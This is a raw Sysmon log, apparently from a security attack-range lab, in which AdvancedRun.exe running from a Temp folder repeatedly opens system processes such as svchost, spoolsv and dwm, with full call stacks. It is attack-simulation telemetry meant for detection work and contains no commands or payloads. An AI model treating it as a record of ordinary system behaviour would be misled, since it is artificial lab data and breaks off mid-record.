20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.823{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.823{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079724Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.823{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.821{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004079721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004079719Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004079717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004079716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004079715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\Advanced